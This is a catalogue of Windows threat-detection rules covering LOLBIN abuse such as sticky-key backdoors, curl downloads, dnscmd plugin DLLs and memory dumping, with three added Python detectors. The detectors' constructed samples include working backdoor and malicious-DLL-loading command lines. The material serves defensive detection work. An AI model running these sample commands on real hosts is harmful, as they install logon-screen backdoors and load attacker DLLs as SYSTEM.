Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use) |
https://twitter.com/vxunderground/status/1423336151860002816?s=20, https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection, https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/ |
Read Contents From Stdin Via Cmd.EXE |
Detect the use of "<" to read and potentially execute a file via cmd.exe |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md, https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe |
Persistence Via Sticky Key Backdoor |
By replacing the sticky keys executable (sethc.exe) with a copy of cmd.exe, an attacker is able to obtain a privileged Windows console session from the login screen without authenticating to the system.
When sticky keys are "activated" (pressing Shift five times), the privileged shell is launched instead.
|
https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html, https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf, https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors |
Sticky Key Like Backdoor Execution |
Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen |
https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors |
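The two entries above describe the same backdoor from two angles: either the accessibility binary is overwritten with cmd.exe, or a "Debugger" value is registered for it under Image File Execution Options (IFEO). The following detector is an added example for this page, not code from the Sigma project or from any of the referenced posts. It checks both a Sysmon registry value-set event and a process command line, and runs over a handful of constructed sample events (not real telemetry). The set of logon-screen accessibility binaries and the field layout of the events are assumptions for this example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Accessibility helpers that Winlogon can start from the logon screen as SYSTEM.
# A "Debugger" value registered for one of them under Image File Execution
# Options (IFEO) is launched in its place, before anyone has authenticated.
LOGON_SCREEN_BINARIES = {
    "sethc.exe", "utilman.exe", "osk.exe", "magnify.exe",
    "narrator.exe", "displayswitch.exe", "atbroker.exe",
}
IFEO_KEY = "\\image file execution options\\"


@dataclass(frozen=True)
class Finding:
    rule: str
    binary: str
    payload: str


def check_registry_event(target_object: str, details: str) -> Optional[Finding]:
    """Sysmon Event ID 13 (value set): TargetObject is the key path, Details the data."""
    t = target_object.lower()
    if IFEO_KEY not in t or not t.endswith("\\debugger"):
        return None
    binary = t.split(IFEO_KEY, 1)[1].split("\\", 1)[0]
    if binary in LOGON_SCREEN_BINARIES:
        return Finding("ifeo_debugger_registry", binary, details)
    return None


_IFEO_TARGET = re.compile(r"\\image file execution options\\([a-z0-9_.-]+\.exe)")
_REG_DATA = re.compile(r"/d\s+(\"[^\"]+\"|\S+)")
_OVERWRITE = re.compile(
    r"\b(copy|move|xcopy)\b.*\bcmd\.exe\b.*\\("
    + "|".join(re.escape(b) for b in sorted(LOGON_SCREEN_BINARIES)) + r")\b")


def check_command_line(cmdline: str) -> Optional[Finding]:
    """Sysmon Event ID 1 / Security 4688: the full process command line."""
    c = cmdline.lower()
    m = _IFEO_TARGET.search(c)
    if m and " add " in c and "debugger" in c and m.group(1) in LOGON_SCREEN_BINARIES:
        d = _REG_DATA.search(c)
        return Finding("ifeo_debugger_cmdline", m.group(1), d.group(1).strip('"') if d else "")
    m = _OVERWRITE.search(c)
    if m:  # classic variant: the helper itself is replaced by cmd.exe
        return Finding("accessibility_binary_overwrite", m.group(2), "cmd.exe")
    return None


# Constructed sample events (not real telemetry): (kind, field1, field2)
SAMPLE_EVENTS = [
    ("registry", r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger", r"C:\Windows\System32\cmd.exe"),
    ("registry", r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe\Debugger", "vsjitdebugger.exe"),
    ("process", r'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f', ""),
    ("process", r"cmd.exe /c copy /y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe", ""),
    ("process", r"reg query HKLM\SOFTWARE\Microsoft\Windows", ""),
]


def scan(events=SAMPLE_EVENTS) -> List[Finding]:
    out = []
    for kind, a, b in events:
        f = check_registry_event(a, b) if kind == "registry" else check_command_line(a)
        if f:
            out.append(f)
    return out


if __name__ == "__main__":
    for f in scan():
        print(f"{f.rule:32} {f.binary:18} -> {f.payload}")
```

The registry check is the more robust of the two: it fires on the value write itself, whatever tool performed it (reg.exe, PowerShell, a direct API call), whereas the command-line check only catches the obvious reg.exe and copy variants. The notepad.exe event is deliberately ignored, since IFEO debuggers for ordinary programs are a legitimate developer feature.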
Potential Download/Upload Activity Using Type Command |
Detects usage of the "type" command to download data from or upload data to a WebDAV server |
https://mr0range.com/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22 |
Unusual Parent Process For Cmd.EXE |
Detects suspicious parent process for cmd.exe |
https://www.elastic.co/guide/en/security/current/unusual-parent-process-for-cmd.exe.html |
CMSTP Execution Process Creation |
Detects various indicators of Microsoft Connection Manager Profile Installer execution |
https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ |
Arbitrary File Download Via ConfigSecurityPolicy.EXE |
Detects the execution of "ConfigSecurityPolicy.EXE", a binary that is part of Windows Defender and is used to manage Windows Defender settings.
It can be abused by attackers in order to upload or download files.
|
https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/ |
Powershell Executed From Headless ConHost Process |
Detects the execution of PowerShell commands from a headless ConHost window.
The "--headless" flag hides the console window from the user upon execution.
|
https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software |
Suspicious High IntegrityLevel Conhost Legacy Option |
Detects "conhost.exe" started with the legacy "ForceV1" option while running at a High IntegrityLevel. ForceV1 requests console information directly from the kernel; Conhost connects to the console application. A High IntegrityLevel means the process is running with elevated privileges, such as in an Administrator context. |
https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29, https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/, https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control |
Conhost.exe CommandLine Path Traversal |
Detects the usage of path traversal in conhost.exe command lines, indicating possible command/argument confusion or hijacking |
https://pentestlab.blog/2020/07/06/indirect-command-execution/ |
Uncommon Child Process Of Conhost.EXE |
Detects uncommon "conhost" child processes. This could be a sign of "conhost" usage as a LOLBIN or potential process injection activity. |
http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/ |
Conhost Spawned By Uncommon Parent Process |
Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity. |
https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html |
Control Panel Items |
Detects the malicious use of a control panel item |
https://ired.team/offensive-security/code-execution/code-execution-through-control-panel-add-ins |
CreateDump Process Dump |
Detects uses of the createdump.exe LOLBIN utility to dump process memory |
https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/, https://twitter.com/bopin2020/status/1366400799199272960 |
Dynamic .NET Compilation Via Csc.EXE |
Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages. |
https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/, https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf, https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/, https://twitter.com/gN3mes1s/status/1206874118282448897, https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1027.004/T1027.004.md#atomic-test-1---compile-after-delivery-using-cscexe |
Csc.EXE Execution From Potentially Suspicious Parent |
Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery. |
https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing, https://reaqta.com/2017/11/short-journey-darkvnc/, https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html |
Suspicious Csi.exe Usage |
Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter on the command line. Early versions of this utility provided with the Microsoft "Roslyn" Community Technology Preview were named "rcsi.exe" |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/, https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/, https://twitter.com/Z3Jpa29z/status/1317545798981324801 |
Suspicious Use of CSharp Interactive Console |
Detects the execution of CSharp interactive console by PowerShell |
https://redcanary.com/blog/detecting-attacks-leveraging-the-net-framework/ |
Active Directory Structure Export Via Csvde.EXE |
Detects the execution of "csvde.exe" in order to export organizational Active Directory structure. |
https://www.cybereason.com/blog/research/operation-ghostshell-novel-rat-targets-global-aerospace-and-telecoms-firms, https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, https://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit, https://redcanary.com/blog/msix-installers/ |
Potential Cookies Session Hijacking |
Detects execution of "curl.exe" with the "-c" flag in order to save cookie data. |
https://curl.se/docs/manpage.html |
Curl Web Request With Potential Custom User-Agent |
Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accepts specific "User-Agent" strings |
https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv |
File Download From IP URL Via Curl.EXE |
Detects file downloads directly from IP address URL using curl.exe |
https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv, https://github.com/pr0xylife/IcedID/blob/8dd1e218460db4f750d955b4c65b2f918a1db906/icedID_09.28.2023.txt |
Suspicious File Download From IP Via Curl.EXE |
Detects potentially suspicious file downloads directly from IP addresses using curl.exe |
https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv, https://github.com/pr0xylife/IcedID/blob/8dd1e218460db4f750d955b4c65b2f918a1db906/icedID_09.28.2023.txt |
Suspicious File Download From File Sharing Domain Via Curl.EXE |
Detects potentially suspicious file download from file sharing domains using curl.exe |
https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv |
Insecure Transfer Via Curl.EXE |
Detects execution of "curl.exe" with the "--insecure" flag. |
https://curl.se/docs/manpage.html |
Insecure Proxy/DOH Transfer Via Curl.EXE |
Detects execution of "curl.exe" with the "--proxy-insecure" or "--doh-insecure" flag, which disables certificate verification for the proxy or DNS-over-HTTPS connection. |
https://curl.se/docs/manpage.html |
Suspicious Curl.EXE Download |
Detects a suspicious curl process start on Windows that writes the requested document to a local file |
https://twitter.com/max_mal_/status/1542461200797163522, https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464, https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt, https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/, https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1105/T1105.md#atomic-test-18---curl-download-file |
Local File Read Using Curl.EXE |
Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files. |
https://curl.se/docs/manpage.html |
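The curl entries above (cookie jar, custom User-Agent, IP URL, file-sharing domain, insecure TLS, insecure proxy/DoH, output to disk, file:// reads) all key on the same command line, so a single parser serves them all. The triage function below is an added example written for this page, not code from the Sigma project or the referenced reports. It normalises curl's short and bundled flags (-sSk, -oFILE) into long option names before matching, which is what keeps the checks from being trivially evaded by flag spelling. The file-sharing domain list is an illustrative subset chosen for the example, and the sample command lines are constructed.

```python
import ipaddress
import re
from typing import List, Tuple
from urllib.parse import urlparse

# Options that consume the next token (or the remainder of a bundled short flag).
SHORT_WITH_VALUE = {"A": "--user-agent", "H": "--header", "c": "--cookie-jar", "b": "--cookie",
                    "o": "--output", "x": "--proxy", "u": "--user", "e": "--referer",
                    "d": "--data", "T": "--upload-file", "X": "--request"}
SHORT_FLAGS = {"k": "--insecure", "O": "--remote-name", "s": "--silent", "S": "--show-error",
               "L": "--location", "f": "--fail", "v": "--verbose"}
LONG_WITH_VALUE = set(SHORT_WITH_VALUE.values()) | {"--doh-url", "--url", "--connect-timeout", "--max-time"}
# Illustrative subset only; a production list would be far longer.
FILE_SHARING_DOMAINS = {"transfer.sh", "anonfiles.com", "mega.nz", "pastebin.com", "temp.sh", "gofile.io"}


def tokenize(cmdline: str) -> List[str]:
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_curl(cmdline: str) -> Tuple[List[Tuple[str, str]], List[str]]:
    """Normalise a curl command line into (long-option, value) pairs and positional URLs."""
    toks = tokenize(cmdline)
    if not toks or re.split(r"[\\/]", toks[0])[-1].lower() not in ("curl", "curl.exe"):
        return [], []
    opts, urls = [], []
    i = 1
    while i < len(toks):
        t = toks[i]
        if t.startswith("--"):
            name, eq, val = t.partition("=")
            if name in LONG_WITH_VALUE and not eq:
                i += 1
                val = toks[i] if i < len(toks) else ""
            if name == "--url":
                urls.append(val)
            else:
                opts.append((name, val))
        elif t.startswith("-") and len(t) > 1:
            letters = t[1:]
            for j, ch in enumerate(letters):
                if ch in SHORT_WITH_VALUE:  # -oFILE or -o FILE
                    val = letters[j + 1:]
                    if not val:
                        i += 1
                        val = toks[i] if i < len(toks) else ""
                    opts.append((SHORT_WITH_VALUE[ch], val))
                    break
                opts.append((SHORT_FLAGS.get(ch, "-" + ch), ""))
        else:
            urls.append(t)
        i += 1
    return opts, urls


def triage_curl(cmdline: str) -> List[str]:
    opts, urls = parse_curl(cmdline)
    names = {n for n, _ in opts}
    found = set()
    if "--cookie-jar" in names:
        found.add("cookie_jar_saved")
    if "--user-agent" in names or any(n == "--header" and v.lower().startswith("user-agent:") for n, v in opts):
        found.add("custom_user_agent")
    if "--insecure" in names:
        found.add("insecure_tls")
    if names & {"--proxy-insecure", "--doh-insecure"}:
        found.add("insecure_proxy_or_doh")
    if names & {"--output", "--remote-name"}:
        found.add("download_to_disk")
    for u in urls:
        p = urlparse(u if "://" in u else "http://" + u)
        host = p.hostname or ""
        if p.scheme == "file":
            found.add("local_file_read")
        try:
            ipaddress.ip_address(host)
            found.add("ip_url")
        except ValueError:
            pass
        if any(host == d or host.endswith("." + d) for d in FILE_SHARING_DOMAINS):
            found.add("file_sharing_domain")
    return sorted(found)


if __name__ == "__main__":
    # Constructed sample command lines, not captured from a real host.
    for cmd in (r'curl.exe -k -A "Mozilla/5.0 custom" -o C:\Users\Public\a.dll http://45.77.1.2/a.dll',
                r"curl -c C:\ProgramData\cj.txt --proxy-insecure -x https://10.0.0.5:8080 https://login.example.com/",
                "curl.exe https://www.example.com/"):
        print(triage_curl(cmd) or "-", "<=", cmd)
```

Note that a proxy given with -x is consumed as the option's value and is therefore not treated as a target URL, so an IP-addressed proxy does not by itself raise "ip_url"; that distinction matters when tuning the IP-URL rules above against corporate proxy traffic.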
ManageEngine Endpoint Central Dctask64.EXE Potential Abuse |
Detects the execution of "dctask64.exe", a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central.
This binary can be abused for DLL injection, arbitrary command and process execution.
|
https://twitter.com/gN3mes1s/status/1222088214581825540, https://twitter.com/gN3mes1s/status/1222095963789111296, https://twitter.com/gN3mes1s/status/1222095371175911424 |
Uncommon Child Process Of Defaultpack.EXE |
Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/, https://www.echotrail.io/insights/search/defaultpack.exe |
Remote File Download Via Desktopimgdownldr Utility |
Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil. |
https://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html |
Suspicious Desktopimgdownldr Command |
Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet |
https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/, https://twitter.com/SBousseaden/status/1278977301745741825 |
Potential DLL Sideloading Via DeviceEnroller.EXE |
Detects the use of the PhoneDeepLink parameter, which causes DeviceEnroller.exe to attempt to load a non-existent DLL named "ShellChromeAPI.dll".
Adversaries can drop their own DLL under that name and have it executed via DeviceEnroller.exe using this parameter
|
https://mobile.twitter.com/0gtweet/status/1564131230941122561, https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html |
Potentially Suspicious Child Process Of ClickOnce Application |
Detects potentially suspicious child processes of a ClickOnce deployment application |
https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 |
Arbitrary MSI Download Via Devinit.EXE |
Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system |
https://twitter.com/mrd0x/status/1460815932402679809, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/ |
DirLister Execution |
Detect the usage of "DirLister.exe" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files. |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1083/T1083.md, https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/ |
PowerShell Web Access Feature Enabled Via DISM |
Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse |
https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature, https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a, https://gist.github.com/MHaggis/7e67b659af9148fa593cf2402edebb41 |
Potentially Suspicious Child Process Of DiskShadow.EXE |
Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules. |
https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow, https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf, https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware, https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/ |
Diskshadow Script Mode - Uncommon Script Extension Execution |
Detects execution of "Diskshadow.exe" in script mode to execute a script with a potentially uncommon extension.
Initial baselining of the allowed extension list is required.
|
https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow, https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf, https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware, https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/ |
Diskshadow Script Mode - Execution From Potential Suspicious Location |
Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location. |
https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow, https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf, https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware, https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/ |
Dism Remove Online Package |
Detects the use of DISM (Deployment Image Servicing and Management) to remove a package or feature from the running (online) Windows image, e.g. to remove Windows Defender. DISM is normally used to enumerate, install, uninstall, configure, and update features and packages in Windows images |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism, https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html |
Dllhost.EXE Execution Anomaly |
Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes. |
https://redcanary.com/blog/child-processes/, https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08, https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf |
DLL Sideloading by VMware Xfer Utility |
Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL |
https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/ |
Potential Discovery Activity Via Dnscmd.EXE |
Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones are used to host the DNS records for a particular domain. |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd, https://learn.microsoft.com/en-us/azure/dns/dns-zones-records, https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/ |
New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE |
Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) |
https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83, https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html |
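The two dnscmd entries above are worth checking together, because the ServerLevelPluginDll write is a one-liner that is easy to miss among routine zone administration. The following detector is an added example for this page and not code from the Sigma project or the linked write-ups. It classifies a dnscmd command line and, independently, the Sysmon registry value-set event for the DNS Parameters key, since the value can be written without dnscmd at all. The discovery switch set and the event field layout are assumptions made for this example; the sample inputs are constructed.

```python
import re
from typing import List, Optional

# Registry value read by the DNS Server service at start-up; the DLL named here is
# loaded into dns.exe, which runs as SYSTEM (on a domain controller, no less).
DNS_PLUGIN_VALUE = "\\services\\dns\\parameters\\serverlevelplugindll"
# dnscmd switches commonly seen in discovery (assumed set for this example).
DISCOVERY_SWITCHES = {"/enumzones", "/zoneprint", "/enumrecords", "/info"}


def _tokens(cmdline: str) -> List[str]:
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def check_dnscmd_cmdline(cmdline: str) -> List[str]:
    """Process-creation view: classify a dnscmd.exe command line."""
    toks = [t.lower() for t in _tokens(cmdline)]
    if not toks or re.split(r"[\\/]", toks[0])[-1] not in ("dnscmd", "dnscmd.exe"):
        return []
    found = []
    if "/config" in toks and "/serverlevelplugindll" in toks:
        i = toks.index("/serverlevelplugindll")
        path = toks[i + 1] if i + 1 < len(toks) else ""
        # A UNC path means the DNS server will fetch the DLL from a remote share
        # on its next restart, so the attacker never needs to write to the DC's disk.
        found.append("plugin_dll_set_unc" if path.startswith("\\\\") else "plugin_dll_set")
    if any(t in DISCOVERY_SWITCHES for t in toks):
        found.append("dns_discovery")
    return found


def check_dns_plugin_registry(target_object: str, details: str) -> Optional[str]:
    """Registry view (Sysmon Event ID 13): fires on the write itself, whatever tool did it.
    Returns the DLL path that was set, or None."""
    if target_object.lower().endswith(DNS_PLUGIN_VALUE) and details.strip():
        return details
    return None


if __name__ == "__main__":
    # Constructed samples, not captured telemetry.
    print(check_dnscmd_cmdline(r"dnscmd.exe /config /serverlevelplugindll \\10.0.0.9\share\evil.dll"))
    print(check_dnscmd_cmdline("dnscmd dc01 /enumzones"))
    print(check_dns_plugin_registry(
        r"HKLM\System\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll",
        r"C:\Windows\System32\evil.dll"))
```

Because the DLL is only loaded when the DNS service restarts, the registry write and a subsequent "sc stop dns / sc start dns" (or a reboot) from the same account are the pair to correlate; the restart is also the point at which the clearing of the value after the fact would hide from a pure process-creation search.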
DNS Exfiltration and Tunneling Tools Execution |
Detects execution of well-known DNS exfiltration and tunneling tools such as dnscat2 and iodine |
https://github.com/iagox86/dnscat2, https://github.com/yarrick/iodine |
Unusual Child Process of dns.exe |
Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) |
https://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns-exe.html |
Potential Application Whitelisting Bypass via Dnx.EXE |
Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code.
Attackers might abuse this in order to bypass application whitelisting.
|
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/, https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ |
Process Memory Dump Via Dotnet-Dump |
Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS.
|
https://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-dump#dotnet-dump-collect, https://twitter.com/bohops/status/1635288066909966338 |
Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE |
Detects execution of arbitrary DLLs or unsigned code via ".csproj" files using Dotnet.EXE. |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/, https://twitter.com/_felamos/status/1204705548668555264, https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/ |
Binary Proxy Execution Via Dotnet-Trace.EXE |
Detects commandline arguments for executing a child process via dotnet-trace.exe |
https://twitter.com/bohops/status/1740022869198037480 |
Potential Recon Activity Using DriverQuery.EXE |
Detects usage of the "driverquery" utility to perform reconnaissance on installed drivers |
https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/, https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/, https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html |
DriverQuery.EXE Execution |
Detects usage of the "driverquery" utility, which can be used to perform reconnaissance on installed drivers |
https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/, https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/, https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html |
Potentially Over Permissive Permissions Granted Using Dsacls.EXE |
Detects usage of Dsacls to grant over permissive permissions |
https://ss64.com/nt/dsacls.html, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11) |
Potential Password Spraying Attempt Using Dsacls.EXE |
Detects possible password spraying attempts using Dsacls |
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone, https://ss64.com/nt/dsacls.html, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11) |
Domain Trust Discovery Via Dsquery |
Detects execution of "dsquery.exe" for domain trust discovery |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md, https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb?gi=41b97a644843 |
Suspicious Kernel Dump Using Dtrace |
Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1 |
https://twitter.com/0gtweet/status/1474899714290208777?s=12, https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace |
Potential Windows Defender AV Bypass Via Dump64.EXE Rename |
Detects when a user is potentially trying to bypass the Windows Defender AV by renaming a tool to dump64.exe and placing it in the Visual Studio folder.
Currently the rule is covering only usage of procdump but other utilities can be added in order to increase coverage.
|
https://twitter.com/mrd0x/status/1460597833917251595 |
DumpMinitool Execution |
Detects the use of "DumpMinitool.exe", a tool that allows dumping process memory via "MiniDumpWriteDump" |
https://twitter.com/mrd0x/status/1511415432888131586, https://twitter.com/mrd0x/status/1511489821247684615, https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/, https://gist.github.com/nasbench/6d58c3c125e2fa1b8f7a09754c1b087f |
Suspicious DumpMinitool Execution |
Detects suspicious ways to use the "DumpMinitool.exe" binary |
https://twitter.com/mrd0x/status/1511415432888131586, https://twitter.com/mrd0x/status/1511489821247684615, https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/ |
New Capture Session Launched Via DXCap.EXE |
